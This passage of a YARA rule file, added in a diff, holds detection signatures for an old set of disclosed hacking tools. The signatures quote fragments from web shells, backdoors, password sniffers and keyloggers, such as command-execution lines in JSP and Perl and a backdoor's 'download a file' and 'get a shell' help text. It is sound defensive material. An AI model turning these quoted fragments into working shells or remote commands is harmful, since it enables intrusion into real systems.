+		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
+	strings:
+		$s0 = "%s Server.exe" fullword ascii
+		$s1 = "Service Port: %s" fullword ascii
+		$s2 = "The Port Must Been >0 & <65535" fullword ascii
+		$s8 = "3--Set Server Port" fullword ascii
+		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
+		$s13 = "Service Name: %s" fullword ascii
+		$s14 = "Server Password: %s" fullword ascii
+		$s17 = "Inject Process Name: %s" fullword ascii
+		
+		$x1 = "WinEggDrop Shell Congirator" fullword ascii
+	condition:
+		5 of ($s*) or $x1 
+}
+
+rule sig_238_letmein {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
+	strings:
+		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
+		$s6 = "Error get users from server!" fullword ascii
+		$s7 = "get in nt by name and null" fullword ascii
+		$s16 = "get something from nt, hold by killusa." fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_token {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file token.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
+	strings:
+		$s0 = "Logon.exe" fullword ascii
+		$s1 = "Domain And User:" fullword ascii
+		$s2 = "PID=Get Addr$(): One" fullword ascii
+		$s3 = "Process " fullword ascii
+		$s4 = "psapi.dllK" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_TELNET {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
+	strings:
+		$s0 = "TELNET [host [port]]" fullword wide
+		$s2 = "TELNET.EXE" fullword wide
+		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
+		$s14 = "Software\\Microsoft\\Telnet" fullword wide
+	condition:
+		all of them
+}
+
+rule snifferport {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d14133b5eaced9b7039048d0767c544419473144"
+	strings:
+		$s0 = "iphlpapi.DLL" fullword ascii
+		$s5 = "ystem\\CurrentCorolSet\\" fullword ascii
+		$s11 = "Port.TX" fullword ascii
+		$s12 = "32Next" fullword ascii
+		$s13 = "V1.2 B" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_webget {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file webget.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
+	strings:
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "GET A HTTP/1.0" fullword ascii
+		$s2 = " error " fullword ascii
+		$s13 = "Downloa" ascii
+	condition:
+		all of them
+}
+
+rule XYZCmd_zip_Folder_XYZCmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
+	strings:
+		$s0 = "Executes Command Remotely" fullword wide
+		$s2 = "XYZCmd.exe" fullword wide
+		$s6 = "No Client Software" fullword wide
+		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
+	condition:
+		all of them
+}
+
+rule ASPack_Chinese {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
+	strings:
+		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
+		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
+		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
+		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
+		$s19 = "= Compress with ASPack" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_EDIR {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
+	strings:
+		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s3 = "if Request.Cookies(\"password\")=\"" ascii
+		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
+		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s19 = "whichdir=Request(\"path\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_filespy {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file filespy.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 50
+		hash = "89d8490039778f8c5f07aa7fd476170293d24d26"
+	strings:
+		$s0 = "Hit [Enter] to begin command mode..." fullword ascii
+		$s1 = "If you are in command mode," fullword ascii
+		$s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii
+		$s9 = "FileSpy.exe" fullword wide
+		$s12 = "ERROR starting FileSpy..." fullword ascii
+		$s16 = "exe\\filespy.dbg" fullword ascii
+		$s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii
+		$s19 = "Should be logging to screen..." fullword ascii
+		$s20 = "Filmon:  Unknown log record type" fullword ascii
+	condition:
+		7 of them
+}
+
+rule ByPassFireWall_zip_Folder_Ie {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
+	strings:
+		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule EditKeyLogReadMe {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
+	strings:
+		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
+		$s1 = "WinEggDrop.DLL" fullword ascii
+		$s2 = "nc.exe" fullword ascii
+		$s3 = "KeyLog.exe" fullword ascii
+		$s4 = "EditKeyLog.exe" fullword ascii
+		$s5 = "wineggdrop" fullword ascii
+	condition:
+		3 of them
+}
+
+rule PassSniffer_zip_Folder_readme {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file readme.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
+	strings:
+		$s0 = "PassSniffer.exe" fullword ascii
+		$s1 = "POP3/FTP Sniffer" fullword ascii
+		$s2 = "Password Sniffer V1.0" fullword ascii
+	condition:
+		1 of them
+}
+
+rule sig_238_gina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file gina.reg"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
+	strings:
+		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
+		$s1 = "REGEDIT4" fullword ascii
+		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
+	condition:
+		all of them
+}
+
+rule splitjoin {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
+	strings:
+		$s0 = "Not for distribution without the authors permission" fullword wide
+		$s2 = "Utility to split and rejoin files.0" fullword wide
+		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
+		$s19 = "SplitJoin" fullword wide
+	condition:
+		all of them
+}
+
+rule EditKeyLog {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
+	strings:
+		$s1 = "Press Any Ke" fullword ascii
+		$s2 = "Enter 1 O" fullword ascii
+		$s3 = "Bon >0 & <65535L" fullword ascii
+		$s4 = "--Choose " fullword ascii
+	condition:
+		all of them
+}
+
+rule PassSniffer {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
+	strings:
+		$s2 = "Sniff" fullword ascii
+		$s3 = "GetLas" fullword ascii
+		$s4 = "VersionExA" fullword ascii
+		$s10 = " Only RuntUZ" fullword ascii
+		$s12 = "emcpysetprintf\\" fullword ascii
+		$s13 = "WSFtartup" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspfile2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
+	strings:
+		$s0 = "response.write \"command completed success!\" " fullword ascii
+		$s1 = "for each co in foditems " fullword ascii
+		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
+		$s19 = "<title>Hello! Welcome </title>" fullword ascii
+	condition:
+		all of them
+}
+
+rule Jc_ALL_WinEggDropShell_rar_Folder_SOCKS {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file SOCKS.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ad2168e9837592eeb120fc6798648b2fe996f79c"
+	strings:
+		$s0 = "http://go.163.com/~sdemo" fullword ascii
+		$s1 = "http://go.163.com/sdemo" fullword wide
+		$s4 = "Player.EXE" fullword wide
+		$s5 = "mailto:sdemo@263.net" fullword ascii
+		$s6 = "S-Player.exe" fullword ascii
+	condition:
+		all of them
+}
+
+rule UnPack_rar_Folder_InjectT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
+	strings:
+		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
+		$s1 = "Explorer.exe" fullword ascii
+		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
+		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
+		$s4 = "The Port Is Out Of Range" fullword ascii
+		$s7 = "Fail To Set The Port" fullword ascii
+		$s11 = "\\psapi.dll" fullword ascii
+		$s20 = "TInject.Dll" fullword ascii
+		
+		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
+		$x2 = "injectt.exe" fullword ascii		
+	condition:
+		( 1 of ($x*) ) and ( 3 of ($s*) )
+}
+
+rule Jc_WinEggDrop_Shell {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
+	strings:
+		$s0 = "Sniffer.dll" fullword ascii
+		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
+		$s5 = "Fport.exe or mport.exe " fullword ascii
+		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
+		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
+		$s15 = ": Del www.exe                   " fullword ascii
+		$s20 = ":Dir *.exe                    " fullword ascii
+	condition:
+		2 of them
+}
+
+rule aspbackdoor_asp1 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
+	strings:
+		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
+		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
+		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
+		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
+		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
+		$s15 = "sql=\"select * from scjh\" " fullword ascii
+	condition:
+		all of them
+}
+
+rule QQ_zip_Folder_QQ {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
+	strings:
+		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s4 = "QQ2000b.exe" fullword wide
+		$s5 = "haoq@neusoft.com" fullword ascii
+		$s9 = "QQ2000b.exe" fullword ascii
+		$s10 = "\\qq2000b.exe" fullword ascii
+		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
+		$s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii
+	condition:
+		5 of them
+}
+
+rule UnPack_rar_Folder_TBack {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
+	strings:
+		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
+		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
+		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
+		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
+		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
+		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
+		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
+		$s8 = "Shell                                 -->Get A Shell" fullword ascii
+		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
+		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
+		$s13 = "Online                                -->List All Connected IP" fullword ascii
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
+		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
+		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
+		$s19 = "Reboot                                -->Reboot The System" fullword ascii
+		$s20 = "Password Sniffering Is Not Running" fullword ascii
+	condition:
+		4 of them
+}
+
+rule sig_238_cmd_2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
+	strings:
+		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
+		$s1 = "InputStream in = child.getInputStream();" fullword ascii
+		$s2 = "String cmd = request.getParameter(\"" ascii
+		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
+		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+	condition:
+		all of them
+}
+
+rule RangeScan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
+	strings:
+		$s0 = "RangeScan.EXE" fullword wide
+		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
+		$s9 = "Produced by isn0" fullword ascii
+		$s10 = "RangeScan" fullword wide
+		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
+	condition:
+		3 of them
+}
+
+rule XYZCmd_zip_Folder_Readme {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
+	strings:
+		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
+		$s20 = "XYZCmd V1.0" fullword ascii
+	condition:
+		all of them
+}
+
+rule ByPassFireWall_zip_Folder_Inject {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
+	strings:
+		$s6 = "Fail To Inject" fullword ascii
+		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
+		$s11 = " Successfully" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_sqlcmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 40
+		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
+	strings:
+		$s0 = "Permission denial to EXEC command.:(" fullword ascii
+		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
+		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
+		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
+		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
+		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
+		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
+	condition:
+		4 of them
+}
+
+rule ASPack_ASPACK {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
+	strings:
+		$s0 = "ASPACK.EXE" fullword wide
+		$s5 = "CLOSEDFOLDER" fullword wide
+		$s10 = "ASPack compressor" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_2323 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
+	strings:
+		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
+		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
+		$s3 = "Failed to execute shell" fullword ascii
+		$s5 = "/h   - Hide Window" fullword ascii
+		$s7 = "Accepted connection from client at %s" fullword ascii
+		$s9 = "Error %d: %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Install.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "95866e917f699ee74d4735300568640ea1a05afd"
+	strings:
+		$s1 = "http://go.163.com/sdemo" fullword wide
+		$s2 = "Player.tmp" fullword ascii
+		$s3 = "Player.EXE" fullword wide
+		$s4 = "mailto:sdemo@263.net" fullword ascii
+		$s5 = "S-Player.exe" fullword ascii
+		$s9 = "http://www.BaiXue.net (" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_TFTPD32 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
+	strings:
+		$s0 = " http://arm.533.net" fullword ascii
+		$s1 = "Tftpd32.hlp" fullword ascii
+		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
+		$s3 = "TFTPD32 -- " fullword wide
+		$s4 = "%d -- %s" fullword ascii
+		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
+		$s12 = "TftpPort" fullword ascii
+		$s13 = "Ttftpd32BackGround" fullword ascii
+		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_iecv {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
+	strings:
+		$s1 = "Edit The Content Of Cookie " fullword wide
+		$s3 = "Accessories\\wordpad.exe" fullword ascii
+		$s4 = "gorillanation.com" fullword ascii
+		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
+		$s12 = "http://nirsoft.cjb.net" fullword ascii
+	condition:
+		all of them
+}
+
+rule Antiy_Ports_1_21 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
+	strings:
+		$s0 = "AntiyPorts.EXE" fullword wide
+		$s7 = "AntiyPorts MFC Application" fullword wide
+		$s20 = " @Stego:" fullword ascii
+	condition:
+		all of them
+}
+
+rule perlcmd_zip_Folder_cmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
+	strings:
+		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
+		$s1 = "s/%20/ /ig;" fullword ascii
+		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
+		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
+		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
+		$s6 = "$execthis = $_;" fullword ascii
+		$s7 = "system($execthis);" fullword ascii
+		$s12 = "s/%2f/\\//ig;" fullword ascii
+	condition:
+		6 of them
+}
+
+rule aspbackdoor_asp3 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
+	strings:
+		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
+		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
+		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
+		$s14 = " Windows NT " fullword ascii
+		$s16 = " WIndows 2000 " fullword ascii
+		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
+		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
+		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_FPipe {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+	strings:
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s3 = " -s    - outbound source port number" fullword ascii
+		$s5 = "http://www.foundstone.com" fullword ascii
+		$s20 = "Attempting to connect to %s port %d" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_concon {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file concon.com"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
+	strings:
+		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_regdll {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
+	strings:
+		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
+		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
+		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
+		$s5 = "Public Property Get oFS()" fullword ascii
+	condition:
+		all of them
+}
+
+rule CleanIISLog {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+	strings:
+		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
+		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
+		$s8 = "CleanIISLog Ver" fullword ascii
+		$s9 = "msftpsvc" fullword ascii
+		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
+		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
+		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
+		$s16 = "Service %s Stopped." fullword ascii
+		$s20 = "Process Log File %s..." fullword ascii
+	condition:
+		5 of them
+}
+
+rule sqlcheck {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
+	strings:
+		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
+		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
+		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
+		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
+		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
+	condition:
+		3 of them
+}
+
+rule sig_238_RunAsEx {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
+	strings:
+		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
+		$s8 = "cmd.bat" fullword ascii
+		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
+		$s11 = "%s Execute Succussifully." fullword ascii
+		$s12 = "winsta0" fullword ascii
+		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
+	condition:
+		4 of them
+}
+
+rule sig_238_nbtdump {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
+	strings:
+		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
+		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
+		$s7 = "Cerberus NBTDUMP" fullword ascii
+		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
+		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
+		$s19 = "%s's password is %s</H3>" fullword wide
+		$s20 = "%s's password is blank</H3>" fullword wide
+	condition:
+		5 of them
+}
+
+rule sig_238_Glass2k {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
+	strings:
+		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
+		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
+		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
+		$s4 = "Glass2k.exe" fullword wide
+		$s7 = "NeoLite Executable File Compressor" fullword ascii
+	condition:
+		all of them
+}
+
+rule SplitJoin_V1_3_3_rar_Folder_3 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21409117b536664a913dcd159d6f4d8758f43435"
+	strings:
+		$s2 = "ie686@sohu.com" fullword ascii
+		$s3 = "splitjoin.exe" fullword ascii
+		$s7 = "SplitJoin" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_EDIT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
+	strings:
+		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
+		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
+		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
+		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
+		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
+		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
+	condition:
+		5 of them
+}
+
+rule aspbackdoor_entice {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file entice.asp"
